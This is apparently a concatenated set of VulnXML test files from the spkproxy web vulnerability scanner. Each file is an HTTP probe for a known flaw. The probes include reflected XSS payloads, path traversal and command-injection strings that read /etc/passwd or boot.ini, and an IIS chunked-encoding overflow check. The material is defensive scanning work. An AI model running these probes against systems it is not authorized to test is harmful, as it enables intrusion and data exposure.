spkproxy/VulnXML/SiteTests/sitetest-84.xml0100664000076500007650000000702407566204543017503 0ustar davedave (/) "Directory indexing is enabled 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /icons/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-85.xml0100664000076500007650000000714107566204543017504 0ustar davedave (/) "InterScan VirusWall administration is accessible without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /interscan/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Administration 200 Administration 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-86.xml0100664000076500007650000000705107566204543017505 0ustar davedave (/) "Default Apache JServ docs should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /jservdocs/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-87.xml0100664000076500007650000000704707566204543017513 0ustar davedave (/) "Apache 2.0 directory indexing is enabled 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /manual/images/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-88.xml0100664000076500007650000000731207566204543017507 0ustar davedave (middle_help_intro.htm) "The system appears to be a Niksun NetDetector (network monitoring). The help files should be available at /NetDetector/quick_help_index.html" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /NetDetector/middle_help_intro.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ NIKSUN-HELP 200 NIKSUN-HELP 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-89.xml0100664000076500007650000000715207566204543017512 0ustar davedave (php.exe?c:\boot.ini) "The Apache config allows php.exe to be called directly." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /php/php.exe?c:\boot.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ boot loader 200 boot loader 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-90.xml0100664000076500007650000000714407566204543017503 0ustar davedave (admin) "Oracle Apache+WebDB gives a lot of system information via the pls/admin script" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /pls/admin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ ENVIRONMENT 200 ENVIRONMENT 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-91.xml0100664000076500007650000000750207566204543017502 0ustar davedave (<script>alert('Vulnerable')</script>) "Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-92.xml0100664000076500007650000000747107566204543017510 0ustar davedave (<script>alert('Vulnerable')</script>) "Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-93.xml0100664000076500007650000000747107566204543017511 0ustar davedave (<script>alert('Vulnerable')</script>) "Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-94.xml0100664000076500007650000000750707566204543017512 0ustar davedave (<script>alert('Vulnerable')</script>) "Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-95.xml0100664000076500007650000000755507566204543017516 0ustar davedave (MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>) "The NetDetector install is vulnerable to Cross Site Scripting (XSS) in it's invalid login message. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-96.xml0100664000076500007650000000721507566204543017510 0ustar davedave (source.asp) "This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CAN-2000-0628." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /site/eg/source.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-97.xml0100664000076500007650000000714707566204543017515 0ustar davedave (soaprouter) "Oracle 9iAS SOAP components allow anonymous users to deploy applications by default." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /soap/servlet/soaprouter HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-98.xml0100664000076500007650000000720007566204543017504 0ustar davedave (realPath.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/realPath.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ WEBROOT 200 WEBROOT 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-99.xml0100664000076500007650000000722407566204543017513 0ustar davedave (buffer1.jsp) "Apache Tomcat default file found which reveals the web root. The /test directory should be removed." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /test/jsp/buffer1.jsp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Internal Servlet 200 Internal Servlet 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/FileTests/0040775000076500007650000000000007670116363014635 5ustar davedavespkproxy/VulnXML/FileTests/IISChunkedBO.xml0100644000076500007650000001154007555774770017540 0ustar davedave OWASP-00002 0.0 2002-04-10 2002-04-30 Public Domain Buffer overflow in the chunked encoding transfer mechanism in Internet Information Server (IIS) 4.0 and 5.0 Active Server Pages allows attackers to cause a denial of service or execute arbitrary code. Windows i386 Microsoft-IIS .*.asp The attacker can cause the web server to crash and restart, and could potentially execute arbitrary code on the web server Delete sample ASP scripts to deter bulk scanners. Install the patch supplied by Microsoft as soon as it is available. POST ${path}/${file} HTTP/1.1
    Accept */*
    Host ${host}:${port}
    Transfer-Encoding chunked
    Content-Type application/x-www-form-urlencoded
    MQ0KRQ0KMA0KDQo=     HTTP Response code ^.*\s(\d\d\d)\s See if we got a custom 404 handler, correctly implemented using a redirection Location: (.*)$ See if we got a custom 404 handler, incorrectly implemented using a return code of 200 (404 Not Found) An unpatched server returns (0x80004005)<br>Unspecified (\(0x80004005\)<br>Unspecified) A patched server returns (0x80004005)<br>Request (\(0x80004005\)<br>Request) The page was not found 200 404 302 500     spkproxy/VulnXML/FileTests/IISChunkedBO.xml~0100644000076500007650000001153407553625443017727 0ustar davedave OWASP-00002 0.0 2002-04-10 2002-04-30 Public Domain Buffer overflow in the chunked encoding transfer mechanism in Internet Information Server (IIS) 4.0 and 5.0 Active Server Pages allows attackers to cause a denial of service or execute arbitrary code. Windows i386 Microsoft-IIS .*.asp The attacker can cause the web server to crash and restart, and could potentially execute arbitrary code on the web server Delete sample ASP scripts to deter bulk scanners. Install the patch supplied by Microsoft as soon as it is available. POST ${path}/${file} HTTP/1.1
    Accept */*
    Host ${host}:${port}
    Transfer-Encoding chunked
    Content-Type application/x-www-form-urlencoded
    MQpFCjAKCgoK     HTTP Response code ^.*\s(\d\d\d)\s See if we got a custom 404 handler, correctly implemented using a redirection Location: (.*)$ See if we got a custom 404 handler, incorrectly implemented using a return code of 200 (404 Not Found) An unpatched server returns (0x80004005)<br>Unspecified (\(0x80004005\)<br>Unspecified) A patched server returns (0x80004005)<br>Request (\(0x80004005\)<br>Request) The page was not found 200 404 302 500     spkproxy/VulnXML/VariableTests/0040775000076500007650000000000007551062034015474 5ustar davedavespkproxy/VulnXML/DirectoryTests/0040775000076500007650000000000007670116364015723 5ustar davedavespkproxy/VulnXML/DirectoryTests/directorytest-0.xml0100664000076500007650000000703707566204543021513 0ustar davedave (backup/) "Backup directory detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}backup/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1000.xml0100664000076500007650000000705207566204543021731 0ustar davedave (filemail.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}filemail.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1001.xml0100664000076500007650000000740407566204543021733 0ustar davedave (FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd) "FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1002.xml0100664000076500007650000000727407566204543021741 0ustar davedave (FileSeek.cgi?head=&foot=;cat%20/etc/passwd) "FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1003.xml0100664000076500007650000000740407566204543021735 0ustar davedave (FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=) "FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1004.xml0100664000076500007650000000727607566204543021745 0ustar davedave (FileSeek.cgi?head=;cat%20/etc/passwd|&foot=) "FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1005.xml0100664000076500007650000000740607566204543021741 0ustar davedave (FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd) "FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1006.xml0100664000076500007650000000727607566204543021747 0ustar davedave (FileSeek2.cgi?head=&foot=;cat%20/etc/passwd) "FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek2.cgi?head=&foot=;cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1007.xml0100664000076500007650000000740607566204543021743 0ustar davedave (FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=) "FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1008.xml0100664000076500007650000000730007566204543021735 0ustar davedave (FileSeek2.cgi?head=;cat%20/etc/passwd|&foot=) "FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}FileSeek2.cgi?head=;cat%20/etc/passwd|&foot= HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1009.xml0100664000076500007650000000702407566204543021741 0ustar davedave (finger) "finger other users 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}finger HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1010.xml0100664000076500007650000000703407566204543021732 0ustar davedave (finger.cgi) "finger other users 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}finger.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1011.xml0100664000076500007650000000703207566204543021731 0ustar davedave (finger.pl) "finger other users 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}finger.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1012.xml0100664000076500007650000000704507566204543021736 0ustar davedave (flexform) "Check Phrack 55 for info by RFP 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}flexform HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1013.xml0100664000076500007650000000705507566204543021740 0ustar davedave (flexform.cgi) "Check Phrack 55 for info by RFP 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}flexform.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1014.xml0100664000076500007650000000754107566204543021741 0ustar davedave (fom.cgi?file=<script>alert('Vulnerable')</script>) "Faq-O-Matic is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}fom.cgi?file=<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-1015.xml0100664000076500007650000000766407566204543021750 